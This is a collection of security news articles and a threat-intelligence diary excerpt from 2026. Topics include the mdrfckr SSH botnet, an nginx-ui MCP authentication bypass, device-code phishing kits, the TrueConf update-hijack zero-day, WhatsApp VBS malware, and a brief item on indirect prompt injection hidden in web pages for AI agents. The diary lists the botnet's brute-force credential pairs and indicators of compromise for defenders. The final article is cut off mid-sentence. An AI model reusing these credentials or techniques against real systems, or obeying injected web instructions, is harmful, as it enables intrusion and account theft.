detection: per-source-IP rate limits (fail2ban, sshguard) will not trigger on this pattern because each IP performs only ~10 login attempts. Detection rules useful against this campaign should aggregate by target account rather than by source IP - ten distinct IPs attempting steam:Steam29! against the same host within five minutes is a stronger signature than any individual IP’s behaviour. The cluster IPs and the credential dictionary are listed in the indicators section. None of the credential pairs are new: steam:Steam29!, postgres:q1, dev:dev5, sammy:sammy26, root:AAAaaa111, root:root000@, sysadmin:test123, test1:passwd, tester:testerpass, sammy:12345. This is the existing Outlaw target list. Why this matters for defenders The detection-engineering implication of the libssh version walk is straightforward: hassh-based detection rules written in 2022 or 2023 against 51cba57125523ce4b9db67714a90bf6e or f555226df1963d1d3c09daf865abdc9a will silently miss the 2026 generation of the same campaign. The SHA-256 of the authorized_keys file remains the most reliable single indicator (it has not changed in four years), but operators relying on hassh enrichment as a leading indicator - for example, alerting on hassh values before a successful authentication occurs - should add 03a80b21afa810682a776a7d42e5e6fb to their watch lists. More broadly, the four-year libssh version walk suggests the campaign operator (or operators - the persistence model has always been consistent with shared infrastructure rather than self-propagation in the strict sense) keeps the targeting infrastructure stable while letting the underlying client library age forward. A defender writing a detection rule against this campaign should expect the hassh to change again on a roughly multi-year cadence as libssh ships new defaults, and should pin alerting to the SHA-256, the public key blob, the mdrfckr comment string, and the recon command sequence - none of which have changed since 2018 - rather than to any single hassh value. What I am not claiming The 24-IP April 2026 cluster is much smaller than the populations port22 worked with. I cannot meaningfully extend port22’s hassh-confidence statistics from one sensor’s eight-day window. The 99.1% / 94.5% figures published in 2022 and 2023 should not be extrapolated to the 2026 hassh from this data alone - that calculation requires a multi-sensor population study, which is exactly the kind of analysis ISC handlers and the DShield operator community are positioned to do better than any of my sensors. Indicators authorized_keys SHA-256 (unchanged since 2018):a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 Public key comment string: mdrfckr April 2026 hassh: 03a80b21afa810682a776a7d42e5e6fb April 2026 SSH client banner: SSH-2.0-libssh_0.11.1 Burst window: 19 April 2026, 06:05:19 → 06:07:30 UTC Credential dictionary: steam:Steam29! ,postgres:q1 ,dev:dev5 ,sammy:sammy26 ,root:AAAaaa111 ,root:root000@ ,sysadmin:test123 ,test1:passwd ,tester:testerpass ,sammy:12345 24 source IPs from the April 2026 cluster (Appendix A) Conclusion The mdrfckr campaign is older than many of the SSH honeypots currently watching it. Its authorized_keys file is approaching its eighth anniversary on VirusTotal and has not been rotated. Its target dictionary, recon sequence, and competitor-cleanup playbook have all remained stable across the four years that public researchers have been tracking the libssh version walk. What changes is the client. The April 2026 hassh 03a80b21afa810682a776a7d42e5e6fb joins 51cba57125523ce4b9db67714a90bf6e and f555226df1963d1d3c09daf865abdc9a as the third documented entry in this campaign’s lineage. Detection rules pinned to either earlier hassh will miss it. I would be very interested to hear from any other DShield operator or ISC handler who has independently observed the 0.11.x hassh writing the SHA-256 above - particularly with population data that would let the community update the hassh-to-mdrfckr confidence figures published by port22 in 2022 and 2023. Acknowledgments Drafting assistance from Claude (Anthropic) [13]. All log review, the hassh and SHA-256 verification, the credential and IP enumeration, and the comparison against prior reporting were done from the sensor’s own logs and the cited public sources. References [3] Trend Micro, https://www.trendmicro.com/en/research/20/b/outlaw-updates-kit-to-kill-older-miner-versions-targets-more-systems.html [4] port22.dk, “mdrfckrs – part one,” March 2023. https://blog.port22.dk/mdrfckrs-part-one/ [5] Jesse La Grew, “More Data Enrichment for Cowrie Logs,” SANS Internet Storm Center, 24 May 2023. https://isc.sans.edu/diary/29878 [6] Guy Bruneau, “DShield Honeypot Activity for May 2023,” SANS Internet Storm Center, 11 June 2023. https://isc.sans.edu/diary/29932 [7] port22.dk, “mdrfckrs – part two,” July 2023. https://blog.port22.dk/mdrfckrs-part-two/ [8] https://isc.sans.edu/honeypot.html [9] Yoroi, “Outlaw is Back: A New Crypto-Botnet Targets European Organizations.” https://yoroi.company/research/outlaw-is-back-a-new-crypto-botnet-targets-european-organizations/ [10] Juniper Threat Research, “Dota3: Is your Internet of Things device moonlighting?” https://blogs.juniper.net/en-us/threat-research/dota3-is-your-internet-of-things-device-moonlighting [11] CounterCraft, “Dota3 malware again and again.” https://www.countercraftsec.com/blog/dota3-malware-again-and-again/
isc.sans.eduMay 15, 2026extracted
Week in review: Claude Mythos finds 271 Firefox flaws, Vercel breach
Week in review: Claude Mythos finds 271 Firefox flaws, Vercel breach Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: SmokedMeat: Open-source tool shows what attackers do inside CI/CD pipelines Boost Security has released SmokedMeat, an open-source framework that runs attack chains against CI/CD infrastructure so engineering and security teams can see what an attacker would do in their specific environment. NGate NFC malware targets Android users through trojanized payment app NFC-based payment fraud is expanding geographically and operationally. A campaign active since November 2025 is targeting Android users in Brazil using a new variant of the NGate malware family, this time embedded in a trojanized version of HandyPay, a legitimate NFC relay application available on Google Play since 2021. ESET Research identified the campaign and attributed two separate NGate samples to the same threat actor. A single platform powers SIM farm proxy networks across 17 countries Racks of phones and 4G modems, connected to carrier networks and rented out as commercial mobile proxy services, are operating across at least 94 locations in 17 countries. An investigation by infrastructure intelligence firm Infrawatch traced a large portion of those deployments to a shared software platform called ProxySmart, built and operated out of Minsk, Belarus. Ransomware, fraud, and lawsuits drive cyber insurance claims to new peaks The 2026 InsurSec Report from At-Bay, covering more than 100,000 policy years of claims data, documents a 7% year-over-year rise in overall claim frequency and an all-time high average severity of $221,000. Ransomware severity reached $508,000, up 16% from the prior year, making it the costliest incident type by a wide margin. Scenario: Open-source framework for automated AI app red-teaming Enterprises running customer service bots, data analytics agents, and other AI-driven applications in production handle sensitive records and connect to core business systems every day. LangWatch has released Scenario, an open-source framework that runs automated red-team exercises against AI agents using multi-turn attack techniques that mirror how adversaries operate in the wild. A year in, Zoom’s CISO reflects on balancing security and business In this Help Net Security interview, Sandra McLeod, CISO at Zoom, reflects on her first year in the role. She talks about moving from reactive firefighting to business strategy, and what she heard from engineers, the board, and customers during her early months. McLeod discusses how she prepared for incident management, the dual job of handling crises and explaining them afterward, and her experience as a woman in technical leadership at Zoom. AI is speeding up nation-state cyber programs In this Help Net Security interview, Kaja Ciglic, Senior Director, Cybersecurity Policy and Diplomacy at Microsoft, discusses how nation-state cyber programs have changed over three years. Cyber has become a core instrument of state power, integrated with military, economic, and diplomatic tools. Ciglic argues that responses like sanctions and indictments need broader strategies, including conditional economic pressure and state accountability for ransomware havens. Ubuntu 26.04 LTS delivers memory-safe system tools and live patching for Arm servers Linux distributions have spent the past few years absorbing GPU vendor toolchains, Rust-based system components, and more stringent encryption defaults. Ubuntu 26.04 LTS, codenamed Resolute Raccoon, pulls most of those threads together into a single release that will receive standard security support until April 2031. AI platform ATHR makes voice phishing a one-person job For $4,000 and a cut of the take, a lone criminal can now run a fully automated voice-phishing operation via ATHR, a plaform that spoofs emails alerts from Google, Microsoft, and Coinbase, buries a phone number in each message, and when the victim calls back, hands them off to either a human scammer or an AI voice agent. Vercel breached via compromised third-party AI tool Cloud deployment and hosting platform Vercel has suffered a security breach that resulted in attackers accessing some of its internal systems and compromising Vercel credentials of a “limited subset of customers”. CISA flags another Cisco Catalyst SD-WAN Manager bug as exploited (CVE-2026-20133) CISA added eight new vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, including a Cisco Catalyst SD-WAN Manager vulnerability (CVE-2026-20133) that Cisco has yet to flag as exploited. Progress Software fixes sneaky WAF bypass vulnerability (CVE-2026-21876) Progress Software has fixed a slew of high-severity vulnerabilities in MOVEit WAF and LoadMaster, including a flaw (CVE-2026-21876) that may allow attackers to bypass firewall detection. New Mirai variants target routers and DVRs in parallel campaigns Hidden inside newly discovered botnet malware is an unusual message from its creator: “AI.NEEDS.TO.DIE”. Dubbed “tuxnokill” by researchers at Akamai, the malware is one of two fresh Mirai botnet variants documented this month by major cybersecurity firms and, judging by the aforementioned hard-coded string, this particular variant might have been coded the old-fashioned way. Apple fixes iPhone bug that let FBI retrieve deleted Signal messages(CVE-2026-28950) Apple has rolled out security updates for iPhones and iPads that fix CVE-2026-28950, a logging issue in Notification Services that made devices unexpectedly retain notifications marked for deletion. The vulnerability was patched following a recent report about the FBI accessing a suspect’s Signal message notification content on their iPhone, despite Signal being deleted from the device. With AI’s help, North Korean hackers stumbled into a near-undetectable attack For many years, state-sponsored hacking was defined by human expertise in finding security holes, writing malware and exploits, pulling off social engineering and phishing attacks, and much more. Since the advent of LLM-powered AI assistants and tools, less skilled attackers have been able to carry out attacks and compromises that might otherwise have been out of their reach. New Cisco firewall malware can only be killed by pulling the plug Suspected state-sponsored attackers are using a custom backdoor to persistently compromise Cisco security devices (firewalls), the US CISA and the UK National Cyber Security Centre warned on Thursday. CISA also shared threat hunting rules US federal civilian agencies should use to search for evidence of the malware on their own systems. Indirect prompt injection is taking hold in the wild The open web is slowly but surely filling up with “traps” designed for LLM-powered AI agents. The technique, known as indirect prompt injection (IPI), involves hiding (more or less) covert instructions inside ordinary web pages, waiting for an AI agent to read them and carry out the author’s commands. How to spot a North Korean fake in a job interview North Korean operatives are getting hired at companies by passing job interviews using fake identities and AI tools. In this Help Net Security video, Adrian Cheek, a senior cybercrime researcher at Flare, outlines several ways organizations can catch these attempts before extending an offer. EU pushes for stronger cloud sovereignty, awards €180 million to four providers The European Commission is stepping up efforts to strengthen the EU’s digital sovereignty by awarding a cloud services tender worth up to €180 million over six years. The initiative gives EU institutions and agencies access to sovereign cloud services delivered by a group of Europe-based providers. Researchers build an encrypted routing layer for private AI inference Organizations in healthcare, finance, and other sensitive industries want to use large AI models without exposing private data to the cloud servers running those models. A cryptographic technique called Secure Multi-Party Computation (MPC) makes this possible. It splits data into encrypted fragments, distributes them across two or more servers that do not share information with each other, and lets those servers compute an AI result without either one ever seeing the raw input. Scattered Spider hacker pleads guilty to stealing $8 million in cryptocurrency A British national tied to the Scattered Spider cybercrime group pleaded guilty to hacking multiple companies via SMS phishing and stealing over $8 million in virtual currency from US victims. Ransomware negotiator admits role in attacks he was hired to resolve A Florida man, formerly employed as a ransomware negotiator, pleaded guilty to conspiring to carry out ransomware attacks against US companies. Apple Intelligence flaw kept stolen tokens reusable on another device Apple claims that Apple Intelligence, a GenAI service provided on its operating systems, is designed with an extra focus on user security and privacy through a two-stage authentication and authorization system using anonymous access tokens. However, researchers from The Ohio State University have identified vulnerabilities in this design, demonstrated on macOS 26.0 (Tahoe), that allow attackers to steal and reuse these tokens. Tencent’s QClaw AI agent app arrives on Windows and macOS Tencent has opened an international beta of QClaw, an AI agent application aimed at consumers in Canada, Japan, Singapore, South Korea, and the United States. The first wave is capped at 20,000 users. Additional markets are scheduled to follow. Claude Mythos finds 271 Firefox flaws, Mozilla believes it shifts security toward defenders The Mozilla Foundation tested Claude Mythos, an Anthropic AI model that has stirred debate in the cybersecurity community. Before granting access to Mythos, Mozilla scanned Firefox using Opus 4.6, which led to fixes for 22 security-sensitive bugs in Firefox 148. For instance, Mythos identified 271 vulnerabilities in Firefox 150. Cyberattack on French government agency triggers phishing alert France Titres, a French government agency, has disclosed a data breach that may have exposed user data from its online portal. According to the agency, the incident was detected on Wednesday, April 15, and remains under investigation, with multiple data types potentially exposed for an undisclosed number of individuals. Google’s Workspace Intelligence promises privacy while running on your data Security and data governance are among the key considerations in Google’s latest AI update, which introduces Workspace Intelligence within Google Workspace. Google describes the feature as “a secure, dynamic system that inherently understands complex semantic relationships within your Workspace apps (such as Docs, Slides, or Gmail) content, your active projects, your collaborators, and your organization’s domain knowledge.” GDPR works, but only where someone enforces it A new measurement study of web tracking across ten countries offers a reality check for anyone working on privacy compliance. Researchers crawled the same set of globally popular websites from virtual machines located in Australia, Brazil, Canada, Germany, India, Singapore, South Africa, South Korea, Spain, and California. The results show that European privacy law does reduce tracking, and that most of the reduction happens in the two jurisdictions where regulators bring cases. OpenAI tackles a bad habit people have when interacting with AI Since people tend to paste personal data into AI tools such as ChatGPT, OpenAI has released Privacy Filter, an open-weight model designed to detect and redact personally identifiable information (PII) in text. The model is available under the Apache 2.0 license on Hugging Face and GitHub. If cyber espionage via HDMI worries you, NCSC built a device to stop it A new cybersecurity device developed by the National Cyber Security Centre (NCSC) should be a helpful solution for protecting governments and businesses from malicious activity carried through display connections. Called SilentGlass, the plug-and-play tool is designed to protect HDMI and DisplayPort links from potential cyberattacks. Hacker with a special interest in breaching sports institutions ends behind bars French police have arrested a suspected hacker linked to a series of data breaches affecting organizations in the country. Citing authorities, Le Parisien reported that the suspect, a 20-year-old man using the alias ‘HexDex,’ was taken into custody on April 22, 2026, in the Vendée region, western France. OpenAI’s GPT-5.5 is out with expanded cybersecurity safeguards Competition to release stronger AI models is accelerating, and just weeks after the release of GPT-5.4, OpenAI has introduced GPT-5.5, pointing to expanded safeguards in the new model. Compromised everyday devices power Chinese cyber espionage operations China-linked threat actors have shifted from individually procured infrastructure to large-scale covert networks, botnets built from compromised routers and other edge devices, the National Cyber Security Centre (NCSC) warns. To help organizations address this threat, the NCSC, together with the Cyber League and partner agencies, has issued an advisory. Users advised to drop passwords and make room for passkeys In a decisive move that could reshape how users log in online, the National Cyber Security Centre (NCSC) is urging consumers to abandon passwords in favour of passkeys, positioning them as the future of authentication. Since most breaches start with stolen or compromised login details, adopting passkeys is viewed as a reliable defence against phishing attacks. Product showcase: Syncthing for secure, private file synchronization Syncthing is a free and open-source application that synchronizes files directly between your devices. Instead of uploading data to a central server, it uses a peer-to-peer approach, transferring files whenever peers are online. This decentralized model ensures that your data remains private and under your control. Meta and PortSwigger drive offensive security further to find what others miss Meta Bug Bounty and PortSwigger have formed a partnership to help security researchers sharpen their skills, collaborate more closely, and improve vulnerability discovery. The initiative combines Meta’s bug bounty program with PortSwigger’s Burp Suite, reflecting a shared focus on improving both tooling and education for the global security community. OpenAI’s Chronicle feature lets Codex read your screen, raising privacy concerns OpenAI’s Chronicle is a feature designed to help Codex, an AI-powered coding assistant, better understand what users are working on by capturing context directly from their screens. It uses recent screen activity to build memories, allowing Codex to interpret references, identify relevant sources, and pick up on the tools and workflows users rely on, without requiring them to restate context in every prompt. VirtualBox 7.2.8 is out with Linux kernel 7.0 support and crash fixes Oracle shipped VirtualBox 7.2.8 on April 21, 2026, as a maintenance release covering crashes, networking problems, clipboard issues, and extended Linux kernel compatibility. The update touches the VMM layer, NAT networking, graphics, UEFI, and both Linux and Windows guest support. Thunderbird 150 arrives with encrypted message search and OpenPGP improvements Released today, Thunderbird 150.0 brings eight new features, a round of bug fixes, and security patches that cover the web engine underlying the email client. Thunderbird 150.0 runs on Windows 10 or later, macOS 10.15 or later, and Linux with GTK+ 3.14 or higher. Shadow AI, deepfakes, and supply chain compromise are rewriting the financial sector threat playbook Financially motivated attacks continued to drive the bulk of cyber incidents against banks, insurers, and payment processors in 2025. Approximately 90% of breaches affecting financial institutions carried a financial motive, with data breaches accounting for roughly 64% of incidents and ransomware making up the remaining 36%. The average cost of a data breach in the sector reached $5.56 million per incident, placing finance second among all industries by breach cost. PentAGI: Open-source autonomous AI penetration testing system Penetration testers have long relied on collections of specialized tools, manual coordination, and documented runbooks to work through a target assessment. PentAGI, an open-source project from VXControl, attempts to automate that entire workflow using a multi-agent AI system that plans, researches, and executes penetration tests with minimal human direction. OneDrive updates focus on AI, access control, and compliance Microsoft OneDrive’s recent updates focus on improving intelligence, collaboration, and administrative control. New enhancements also enable the generation of documents, presentations, spreadsheets, and other structured outputs from content stored in SharePoint. Phishing reclaims the top initial access spot, attackers experiment with AI tools Phishing returned as the leading method attackers used to break into organizations in the first quarter of 2026, accounting for over a third of engagements where initial access could be determined, according to Cisco Talos. It is the first quarter phishing has led the category since Q2 2025, when exploitation of public-facing applications took over following widespread attacks against on-premises Microsoft SharePoint servers GopherWhisper APT group hides command and control traffic in Slack and Discord Attackers continue to lean on everyday collaboration platforms to hide command and control traffic inside normal enterprise noise. A newly identified China-aligned APT group pushes that trend further, running its operations through Slack workspaces, Discord servers, Outlook drafts, and the file.io sharing service. Google brings instant email verification to Android, no OTP needed Google has introduced cryptographically verified email credentials for Android through the Credential Manager API. This API aligns with the W3C Digital Credential API standard. It provides a unified way for apps to request and retrieve user credentials for authentication and authorization. Where AI in CI/CD is working for engineering teams Developers have folded AI into daily coding work. Still, the same tools remain largely absent from the systems that validate and ship software. New research from JetBrains points to a widening gap between how engineers write code on their own machines and what runs inside continuous integration and delivery pipelines. IT spending to hit $6.31 trillion record, thanks to AI Global spending on IT is expected to reach $6.31 trillion in 2026, according to the latest quarterly forecast from Gartner, marking a 13.5% increase from the previous year. The forecast shows that growth is spread across all major segments, though not evenly. A study of 1,000 Android apps finds a privacy policy logging gap Android developers write log statements for the same reasons they always have: debugging crashes, tracing performance issues, and understanding how features behave in production. Legal and privacy teams, working from templates and regulatory checklists, draft policies describing what the app collects from users. These two workflows rarely intersect inside the same company. A new study of 1,000 Android apps shows what that disconnect looks like at scale, and the gap has implications for GDPR and CCPA exposure. Meta is overhauling how you sign in, manage settings, and protect your accounts Meta Account gives users of Meta apps and devices a simpler way to access and manage their accounts. Accounts Center will automatically be updated to a Meta Account as part of a gradual rollout over the next year. Users will be notified when the change occurs. Cybersecurity jobs available right now: April 21, 2026 We’ve scoured the market to bring you a selection of roles that span various skill levels within the cybersecurity field. Check out this weekly selection of cybersecurity jobs available right now.
helpnetsecurity.comApr 26, 2026extracted
Critical Nginx-ui MCP Flaw Actively Exploited in the Wild
A critical authentication bypass in nginx-ui, a widely used open-source web interface for managing nginx servers, has been actively exploited in the wild. The vulnerability, tracked as CVE-2026-33032 with a CVSS score of 9.8, was discovered by Pluto Security and allows any network-adjacent attacker to take full control of an nginx server through a single unauthenticated API request. VulnCheck has added the flaw to its Known Exploited Vulnerabilities (KEV) list. Recorded Future's Insikt Group independently flagged it in a recent report as one of 31 high-impact vulnerabilities exploited during March 2026, assigning it a risk score of 94 out of 100. Missing Middleware, Full Access The root cause comes down to a single missing function call: nginx-ui recently added support for the Model Context Protocol (MCP), which splits communication across two HTTP endpoints. The /mcp endpoint, used for establishing connections, carries both IP whitelisting and authentication middleware. But /mcp_message, the endpoint that processes every tool invocation including configuration writes and server restarts, shipped without the authentication check. That omission exposes 12 MCP tools to unauthenticated callers. Seven are destructive, enabling attackers to inject nginx configurations, reload the server and intercept all traffic passing through it. The remaining five provide reconnaissance capabilities such as reading existing configs and mapping backend infrastructure. Thousands of Instances at Risk Pluto Security's researchers said they used Shodan to identify over 2,600 publicly reachable nginx-ui instances across cloud providers including Alibaba Cloud, Oracle and Tencent. Most were running on the default port 9000. The tool's Docker image has been pulled more than 430,000 times, suggesting a much larger population of potentially vulnerable deployments sitting behind firewalls. The nginx-ui maintainers released a patch in version 2.3.4 just one day after disclosure. The fix amounted to 27 characters of added code, along with a regression test to prevent the same oversight from recurring. Organizations running nginx-ui with MCP enabled should take immediate action: Update to version 2.3.4 or later If patching is not possible, disable MCP functionality entirely Restrict network access to the management interface Review server logs and configuration directories for unauthorized changes This is the second MCP vulnerability Pluto Security has disclosed in recent weeks, following MCPwnfluence, an SSRF-to-RCE chain in the Atlassian MCP server. Both cases expose a recurring weakness: when MCP is connected to existing applications, its endpoints often inherit full capabilities without inheriting any of the security controls.
infosecurity-magazine.comApr 15, 2026extracted
Device code phishing attacks surge 37x as new kits spread online
Device code phishing attacks that abuse the OAuth 2.0 Device Authorization Grant flow to hijack accounts have surged more than 37 times this year. In this type of attack, the threat actor sends a device authorization request to a service provider and receives a code, which is sent to the victim under various pretexts. Next, the victim is tricked into entering the code on the legitimate login page, thus authorizing the attacker's device to access the account through valid access and refresh tokens. This flow was designed to simplify connecting devices that do not have accessible input options (e.g., IoT devices, printers, streaming devices, and smart TVs). The device code phishing technique was first documented in 2020, but malicious exploitation was recorded a few years later, and has been used by both state-hackers and financially-motivated ones [1, 2, 3, 4]. Researchers at Push Security observed a massive increase in the use of these attacks, warning that they have been widely adopted by cybercriminals. Earlier this week, threat detection and response company Sekoia published research on the EvilTokens phishing-as-a-service (PhaaS) operation. The researchers underline that it is a prominent example of a phishing kit that “democratizes” device code phishing, making it available to low-skilled cybercriminals. Push agrees that EvilTokens has been a major driver of the technique's mainstream adoption, but notes that there are several other platforms competing on the same market, which could become more prominent in the event of law enforcement disrupting EvilTokens: VENOM - A closed-source PhaaS kit offering both device code phishing and AiTM capabilities. Its device code component appears to be an EvilTokens clone. SHAREFILE - A kit themed around Citrix ShareFile document transfers, using node-based backend endpoints to simulate file sharing and trigger device code flows. CLURE - A kit using rotating API endpoints and an anti-bot gate, with SharePoint-themed lures and backend infrastructure on DigitalOcean. LINKID - A kit leveraging Cloudflare challenge pages and self-hosted APIs, using Microsoft Teams and Adobe-themed lures. AUTHOV - A workers.dev-hosted kit using popup-based device code entry and Adobe document-sharing lures. DOCUPOLL - A kit hosted on GitHub Pages and workers.dev that mimics DocuSign workflows, including injected replicas of real pages. FLOW_TOKEN - A workers.dev-hosted kit using Tencent Cloud backend infrastructure, with HR and DocuSign-themed lures and popup-based flows. PAPRIKA - An AWS S3–hosted kit using Microsoft login clone pages with Office 365 branding and a fake Okta footer. DCSTATUS - A minimal kit with generic Microsoft 365 “Secure Access” lures and limited visible infrastructure markers. DOLCE - A Microsoft PowerApps-hosted kit with Dolce & Gabbana–themed lures, likely a one-off or red-team-style implementation rather than widely used. It should be noted that other than Venom and EvilTokens, the names of the other phishing kits were given by Push researchers to track the malicious activity. Push Security also published a video showing how the DOCUPOLL kit works. The threat actor uses DocuSign branding and a lure for an alleged contract, asking the victim to sign into the Microsoft Office application. In total, there are at least 11 phishing kits offering cybercriminals this type of attack, all using realistic SaaS-themed lures, anti-bot protections, and abusing cloud platforms for hosting. To block device-code phishing attacks, Push Security suggests that users disable the flow when not needed by setting conditional access policies on their accounts. It is also recommended to monitor logs for unexpected device code authentication events, unusual IP addresses, and sessions. Overall prevention scores can hide what happens after initial access. Once attackers are using valid credentials, prevention drops sharply. The Blue Report 2026 measures defenses technique by technique across 338 million simulations run in customer production environments. Get the report
bleepingcomputer.comApr 4, 2026extracted
CISA gives agencies two weeks to patch video conferencing bug exploited by Chinese hackers
CISA gives agencies two weeks to patch video conferencing bug exploited by Chinese hackers A bug in a popular line of video conferencing software is being exploited by hackers, prompting the U.S. government to order all agencies to patch the vulnerability within two weeks. The Cybersecurity and Infrastructure Security Agency (CISA) gave federal agencies until April 16 to patch CVE-2026-3502, a vulnerability in the video conferencing tool TrueConf. The bug carries a severity score of 7.8 out of 10. CISA’s confirmation that the vulnerability is being exploited follows a report from cybersecurity researchers at Check Point outlining an alleged Chinese hacking campaign targeting governments in Southeast Asia. Check Point said Chinese hackers have been exploiting the vulnerability in a campaign they call TrueChaos. The campaign started in early 2026 and typically involved the Havoc penetration testing tool, which Chinese actors have repeatedly abused over the last year. Check Point said it disclosed the bug to TrueConf, which developed a fix that was released in March. “At the beginning of 2026, Check Point Research observed a series of targeted attacks against government entities in Southeast Asia carried out via a legitimate TrueConf software installed in the targets’ environment,” the researchers said. “The flaw affects the application’s updater validation mechanism and allows an attacker controlling an on-premises TrueConf server to distribute and execute arbitrary files across connected endpoints.” During exploitation of the bug, the hackers used the trusted update channel to distribute malicious updates. Check Point noted that the targeting indicates the campaign was likely focused on espionage. TrueConf is used widely across organizations in Asia, Europe and the Americas, serving about 100,000 organizations globally. Check Point said it is used primarily by government, military, and critical infrastructure sectors “to ensure absolute data privacy and communication autonomy in secure or remote environments.” “In locations with poor or no internet connectivity, or during natural disasters when traditional networks are down, it facilitates essential coordination. By hosting the server on internal hardware, all audio, video, and chat traffic remains strictly contained on-site, with offline activation available for fully air-gapped systems,” Check Point explained. Most infections likely began through a link sent to the victims. The links launched the TrueConf client and showed an update prompt alleging that there is a newer version available. “Prior to the victim’s interaction, the attacker had already replaced the update package on the TrueConf on-premises server with a weaponized version, ensuring that the client retrieved a malicious file through the normal update process,” Check Point said. “The compromised TrueConf on-premises server was operated by the governmental IT department and served as a video conferencing platform for dozens of government entities across the country, which were all supplied with the same malicious update.” Check Point attributed the campaign to Chinese actors based on the tactics deployed and the use of Alibaba Cloud and Tencent hosting tools. The company also saw the same victim targeted with the ShadowPad malware — a hallmark of Chinese actors. Jonathan Greig is a Breaking News Reporter at Recorded Future News. Jonathan has worked across the globe as a journalist since 2014. Before moving back to New York City, he worked for news outlets in South Africa, Jordan and Cambodia. He previously covered cybersecurity at ZDNet and TechRepublic.
therecord.mediaApr 3, 2026extracted
Hackers exploit TrueConf zero-day to push malicious software updates
Hackers have targeted TrueConf conference servers in attacks that exploit a zero-day vulnerability, allowing them to execute arbitrary files on all connected endpoints. The flaw is tracked as CVE-2026-3502 and received a medium severity score. It stems from a missing integrity check in the software’s update mechanism, which can be used to replace the legitimate update with a malicious variant. TrueConf is a video conferencing platform that can run as a self-hosted server. Although it also supports cloud deployments, it is generally designed for closed, offline environments. According to the vendor, more than 100,000 organizations transitioned to TrueConf during the COVID-19 pandemic for remote online business activities. Among TrueConf users are military forces, government agencies, oil and gas corporations, and air traffic management companies. CheckPoint researchers have been tracking a campaign they track as TrueChaos that, since the beginning of the year, has exploited CVE-2026-3502 in zero-day attacks targeting government entities in Southeast Asia. “An attacker who gains control of the on-premises TrueConf server can replace the expected update package with an arbitrary executable, presented as the current application version, and distribute it to all connected clients,” CheckPoint says. “Because the client trusts the server-provided update without proper validation, the malicious file can be delivered and executed under the guise of a legitimate TrueConf update.” The flaw affects TrueConf versions 8.1.0 through 8.5.2, and following CheckPoint’s report to the vendor, a fix was released in version 8.5.3 in March 2026. “TrueChaos” operation CheckPoint has moderate confidence in attributing the TrueChaos activity to a Chinese-nexus threat actor, based on tactics, techniques, and procedures (TTPs), the use of Alibaba Cloud and Tencent for hosting the command and control (C2) infrastructure, and victimology. The attacks spread through a centrally managed government TrueConf server, impacting multiple agencies, pushing malicious files via fake updates to all connected TrueConf clients. The infection chain includes DLL sideloading and the deployment of reconnaissance tools (tasklist, tracert), privilege escalation (UAC bypass via iscicpl.exe), and the establishment of persistence. The researchers were unable to recover the final payload, but noted that network traffic pointed to Havoc C2 infrastructure, making it highly likely that the Havoc implant was used. Havoc is an open-source C2 framework capable of executing commands, managing processes, manipulating Windows tokens, executing shellcode, and deploying additional payloads on compromised systems. It has previously been used by the Chinese threat cluster ‘Amaranth Dragon’ in attacks with a similar targeting scope. CheckPoint's report shares indicators of compromise (IoCs) as well as multiple infection signals. Strong signs of a breach include the presence of poweriso.exe or 7z-x64.dll, and suspicious artifacts like %AppData%\Roaming\Adobe\update.7z or iscsiexe.dll. Overall prevention scores can hide what happens after initial access. Once attackers are using valid credentials, prevention drops sharply. The Blue Report 2026 measures defenses technique by technique across 338 million simulations run in customer production environments. Get the report
bleepingcomputer.comApr 1, 2026extracted
WhatsApp on Windows users targeted in new campaign, warns Microsoft
Microsoft researchers found a campaign that abuses WhatsApp attachments to sneak a script onto Windows machines which will lead to the attacker gaining remote control. WhatsApp offers a desktop application for Windows and macOS, which users can synchronize with their mobile devices. Desktop versions of WhatsApp are generally used as extensions of mobile apps rather than primary platforms. So, while wide usage of these apps exists, their adoption rate is likely significantly lower when compared to mobile platforms. Last year, we wrote about Meta closing a vulnerability that allowed an attacker to run arbitrary code on a Windows system which existed in all WhatsApp versions before 2.2450.6. The attacks found by Microsoft however are based solely on social engineering. The target receives a WhatsApp attachment that looks harmless enough, but it is actually a .vbs (Visual Basic Script) file that Windows can execute. If the attacker manages to convince the victim to run the file on Windows, the script copies built‑in Windows tools into a hidden folder and gives them misleading names so they look harmless at first glance. And the tools themselves are legitimate ones, but they’re abused to download malware. A classic living off the land (LOTL) technique which uses what’s already on the system instead of introducing malware binaries that would get picked up in a scan. The next scripts are pulled from popular cloud providers, so network traffic looks like normal access to AWS, Tencent Cloud, or Backblaze instead of some shady server that would raise red flags. To turn off other possible alarms, the malware keeps trying to elevate itself to administrator, then tweaks UAC (User Account Control) prompts and registry settings so it can silently make system‑level changes and persist across reboots. At the end of the infection chain, an unsigned MSI (Microsoft Installer) sets up remote‑access software and other payloads, giving the attacker ongoing, hands‑on access to the machine and data. How to stay safe For home users and small businesses, there are some practical steps to stay safe: Do not open unsolicited attachments until you have verified with a trusted source that they are safe. Turn on View File name extensions in Explorer so that a file claiming to be picture but ending in .vbs or .msi can be identified as such. Use an up-to-date real-time anti-malware solution to stop unwanted connections and identify malicious files. Download software only from the vendor’s official site and check that installers are signed. Don’t ignore warning signs. Unexpected UAC prompts, new software suddenly appearing, or your machine becoming sluggish after opening a WhatsApp attachment are all reasons for an anti-malware scan and, if needed, be prepared to restore from a clean backup. Keep Windows and all other applications current to prevent from exploiting known vulnerabilities. From reporting threats to removing them. Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.
malwarebytes.comApr 1, 2026extracted
Microsoft Warns of WhatsApp-Delivered VBS Malware Hijacking Windows via UAC Bypass
Microsoft is calling attention to a new campaign that has leveraged WhatsApp messages to distribute malicious Visual Basic Script (VBS) files. The activity, beginning in late February 2026, leverages these scripts to initiate a multi-stage infection chain for establishing persistence and enabling remote access. It's currently not known what lures the threat actors use to trick users into executing the scripts. "The campaign relies on a combination of social engineering and living-off-the-land techniques," the Microsoft Defender Security Research Team said. "It uses renamed Windows utilities to blend into normal system activity, retrieves payloads from trusted cloud services such as AWS, Tencent Cloud, and Backblaze B2, and installs malicious Microsoft Installer (MSI) packages to maintain control of the system." The use of legitimate tools and trusted platforms is a deadly combination, as it allows threat actors to blend in normal network activity and increase the likelihood of success of their attacks. The activity begins with the attackers distributing malicious VBS files via WhatsApp messages that, when executed, create hidden folders in "C:\ProgramData" and drop renamed versions of legitimate Windows utilities like "curl.exe" (renamed as "netapi.dll") and "bitsadmin.exe" (renamed as "sc.exe"). Upon gaining an initial foothold, the attackers aim to establish persistence and escalate privileges, ultimately installing malicious 